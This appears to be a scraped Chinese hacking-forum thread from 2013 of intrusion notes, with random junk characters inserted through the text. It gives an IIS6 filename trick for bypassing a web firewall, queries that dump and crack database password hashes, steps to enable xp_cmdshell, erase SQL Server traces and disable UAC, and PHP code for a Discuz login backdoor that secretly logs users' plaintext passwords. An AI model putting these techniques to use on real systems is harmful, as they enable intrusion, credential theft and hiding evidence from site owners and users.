在它下面直接插入即可,记录的密码生成在pwd.txt中,+ t: C" O3 @/ {! g; k1 r
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
$ M! ~8 J4 K! P1 k利用II6文件解析漏洞绕过安全狗代码:: r4 L* {7 t" C3 y
;antian365.asp;antian365.jpg
& Q0 G: j3 }+ s# o" J" A0 Y
4 Q5 N5 z& A. L+ E P各种类型数据库抓HASH破解最高权限密码!) ]9 [6 |3 p. Z# V0 ]
1.sql server2000) n0 {) V8 H; s$ @2 p% f' |
SELECT password from master.dbo.sysxlogins where name='sa'' ]/ E E7 @6 }6 y! t7 U
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341( h1 c7 X# _- @7 v. E
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
A+ ?. ]- V2 L j2 t7 P: F8 a3 r$ `* m B0 G
0×0100- constant header0 z# u7 k) {% B- w4 o7 S
34767D5C- salt
3 f9 k: d; A. B! ]: ^0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash0 L9 e0 q) O4 {, g: F3 p
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash0 B F& O, k1 F+ p& z
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash& ^2 D- ^# m6 ~7 C5 |9 {
SQL server 2005:-
* {9 }# u5 p& I$ ]7 J9 SSELECT password_hash FROM sys.sql_logins where name='sa'% U0 c) k. g4 M/ w0 _( \' M% e
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F) n6 g, J# `% b
0×0100- constant header
) ]0 c* v6 N- F- F993BF231-salt
) `9 w% f- t; {$ G$ r% R5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash8 n8 N3 b& W* R6 N$ B* v4 z
crack case sensitive hash in cain, try brute force and dictionary based attacks.
6 U1 y+ l+ Z f1 A
" S: B2 U$ |6 j$ vupdate:- following bernardo’s comments:-8 z# z! M' R2 @9 M* t" v4 ^6 d
use function fn_varbintohexstr() to cast password in a hex string.; S- i4 d. M [) S* k: W- z. f, v! _
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins( C* K1 A# k# X( y
) T e- w$ b; R4 H) I
MYSQL:-* G2 ?/ Y; p+ C) L
* q1 \' ~- Z% o0 X; `3 N* i. w
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
0 y8 E$ ?& X# O) ?& k
1 B& q* a H5 k*mysql < 4.1
( a) C9 J. [# x) c
2 u3 X+ H" l; e7 O+ \mysql> SELECT PASSWORD(‘mypass’);; F' q7 u Q& Z# y( X7 Q
+——————–+$ L: _+ }: Q7 A7 p" Z! S. m
| PASSWORD(‘mypass’) |* W; `5 J- N+ I# C
+——————–+
% n7 T! @4 H. v2 f) S+ o4 g| 6f8c114b58f2ce9e |
5 s0 Q6 g2 L! w: K8 E; h/ B# q/ [9 [+——————–+, S! M r: z }+ c. w9 t7 j6 v
. g& C- c& v4 H" n: c8 D
*mysql >=4.1
% z5 e; ]$ z; M4 D4 I$ s
7 P% q+ h( E" s4 p f2 Nmysql> SELECT PASSWORD(‘mypass’);* y6 ^# t; e% Z% V( |8 B/ o
+——————————————-+
9 b' s+ D4 K" L& h" u| PASSWORD(‘mypass’) |) c' F' @) L% o4 r0 X' ~+ t
+——————————————-+5 Z- N h' Q# c0 }8 S3 v
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
4 i7 q! R9 D1 M# h, B: g" p; j+——————————————-+
* P$ U0 i+ H0 } h* P( k; _ a$ `# `/ b& d6 F9 ]+ I/ k
Select user, password from mysql.user
3 g3 I3 Z- z0 W! T8 UThe hashes can be cracked in ‘cain and abel’4 f7 d6 t: h- f; V& C8 F
3 ` B1 I K$ W' F" U4 ?Postgres:-
( U" g* K& a7 x: a/ H1 w" OPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
5 I* w' l/ O# G! M9 ^select usename, passwd from pg_shadow;
. P! |2 @- H) i: J$ A$ k& ousename | passwd; g+ Q* M8 d) c& y4 t% E; |
——————+————————————-
& W( V# ]1 d ?2 J+ @testuser | md5fabb6d7172aadfda4753bf0507ed4396
4 G0 a! q9 h( F) c( puse mdcrack to crack these hashes:-$ z |" d5 @; s2 E
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
; v7 E4 L1 A8 q3 \0 r8 f2 X7 G. O' J" J; G) P7 e
Oracle:-/ C$ _! c6 B: f# E" J1 X% ?
select name, password, spare4 from sys.user$6 S+ D) o1 ]* n8 y4 \" r, O
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
. g2 N4 U/ }. ]) B rMore on Oracle later, i am a bit bored…./ r5 E/ u- \# M+ y0 U% }. z: `% C
( T/ |' ?* \7 Y+ w
0 J5 x5 B, ]/ M: ^0 J. f7 M在sql server2005/2008中开启xp_cmdshell
; x& w# T7 ]) X/ H% w-- To allow advanced options to be changed.
$ A( h! P4 Z% X& r ^9 YEXEC sp_configure 'show advanced options', 1
6 ]7 j6 J# ]8 ^* C- {0 K# f% s% GGO
3 p- V$ O+ F4 f0 \-- To update the currently configured value for advanced options.
, @. ~& g: q9 N; {2 R6 P: |! vRECONFIGURE
- ]/ ?; j5 ^6 _GO; I4 z4 `9 X, {1 ^+ H: q- L& E
-- To enable the feature.6 M0 Y, R# B2 X; j/ l
EXEC sp_configure 'xp_cmdshell', 1# I& P( p! ]6 s6 Z
GO
4 V% q4 f) I K1 l5 _-- To update the currently configured value for this feature.
$ ^1 W) G5 a; p. Z4 Z; H+ e6 @' TRECONFIGURE$ S# {- M$ _% e( V
GO- Z0 `/ r+ E4 G: a9 x
SQL 2008 server日志清除,在清楚前一定要备份。 J6 J. \0 a: R* F; x+ O
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:$ V7 k6 g9 m/ M4 W, |3 p3 ]( z
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin" o0 R$ c5 A5 ~! {0 q! b0 g: P8 O
8 G7 G5 q. \$ F; {对于SQL Server 2008以前的版本:
, {$ a- t% g% j: t0 y# U5 jSQL Server 2005:& D! l+ Z& k; @
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat! W+ x$ |5 N( M. h2 k Q' e
SQL Server 2000:7 T3 Z( ^$ P$ n' i2 c
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
; B0 w' W5 ^- f6 X. M5 m! b6 O
3 ], ]8 h- B( H ?本帖最后由 simeon 于 2013-1-3 09:51 编辑
2 d9 @( u- b+ R+ R& x; c# l6 Y: C! r
4 T% i6 m# a3 p) ?2 j/ @0 a
windows 2008 文件权限修改7 S* {' `4 Q1 ^3 D, v
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
4 E5 H3 H7 D& |8 P- {& V" K2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
" V3 G% K( X& ?9 J- \8 h# K一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,% N7 c+ y5 L8 m% r6 h E0 C8 O9 h l
5 p6 G6 @1 Y3 _# T8 r1 c2 K
Windows Registry Editor Version 5.00
& R8 F9 W" T q% Z6 l0 E/ D6 h0 Y& l F[HKEY_CLASSES_ROOT\*\shell\runas]
2 p- q/ k* ]) r9 S5 Y4 m@="管理员取得所有权"
& u _( s4 N9 \5 A4 j! w"NoWorkingDirectory"=""- x3 K4 y% m* i5 j" }
[HKEY_CLASSES_ROOT\*\shell\runas\command]& f' X- q" p3 D# Z q2 y: C# g
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
: P d! k. |+ B% p$ c4 _! a9 ^"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F") B; z4 H# Z: E: i
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
* u" f o( P- L@="管理员取得所有权"* r6 h% j& E1 p5 {
"NoWorkingDirectory"=""
3 r+ m3 s+ g% H5 J2 g Z[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
. N# i2 _4 O R6 {@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
K, V9 n& u. P+ S( H"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
& {2 N0 h+ g) ^6 j; k
. a! @% H4 Q% V9 n[HKEY_CLASSES_ROOT\Directory\shell\runas]5 ^6 m" i6 _9 _* k4 K9 m- Q
@="管理员取得所有权"! I/ x% Z L/ L$ m
"NoWorkingDirectory"=""9 R- I4 L" f/ y' Q1 N) Z. g
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]' s- a1 M' h) i, w z6 V k L/ K
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
5 Y6 Q+ s X9 h% T0 m/ ~: j1 ]"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
' Y3 G0 P' w, ^+ C; s
m5 s. Z: R( ~
$ r' V8 s, v- U4 F$ @( x; F3 M/ r ewin7右键“管理员取得所有权”.reg导入
! M. r) p' [/ V' }$ n- a二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,. ]3 F8 T6 E" ~. j0 e5 V
1、C:\Windows这个路径的“notepad.exe”不需要替换
B) p, v8 L( f4 `+ D4 `2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
* E3 o! i: U& a: V3、四个“notepad.exe.mui”不要管
2 q# {" p2 j, g$ H/ J5 E( v4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和+ N2 X% k0 W1 J# u
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
& `* N B& }0 Y9 t( x4 \替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
- f# q% F3 ~+ G6 N2 D; r替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
0 l* {0 _3 f5 g1 K- d, F" G& \+ rwindows 2008中关闭安全策略:
; P9 @5 z. f3 x! N' preg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
$ V% W+ E$ y8 I修改uc_client目录下的client.php 在
3 X2 K8 R+ E9 s" w3 o# sfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {8 n% V" R6 A" s
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
# U J/ _, M% G3 d) q" U2 w你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
5 \+ K2 Z; d" v+ W ?& K: g" Iif(getenv('HTTP_CLIENT_IP')) {; }/ g$ R5 t. k% N8 a) S
$onlineip = getenv('HTTP_CLIENT_IP');( S8 ]6 F6 Z5 ^6 W
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {( w2 q1 z" N7 A
$onlineip = getenv('HTTP_X_FORWARDED_FOR');2 e4 J& U6 y7 X1 I$ {
} elseif(getenv('REMOTE_ADDR')) {0 x! P' B1 O% z) d( B* X
$onlineip = getenv('REMOTE_ADDR');* N# x2 y8 U9 q6 g
} else {
3 v+ t; E& s6 g7 n+ ]! x0 ^$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
( v. v$ Y, a+ b( ^" x}
( Z+ P" a) ^( I $showtime=date("Y-m-d H:i:s");# @% A$ U9 R, D
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
6 `) Q6 u- M) k7 E# j* g $handle=fopen('./data/cache/csslog.php','a+');
9 E9 t- }7 s8 ?6 \* q $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对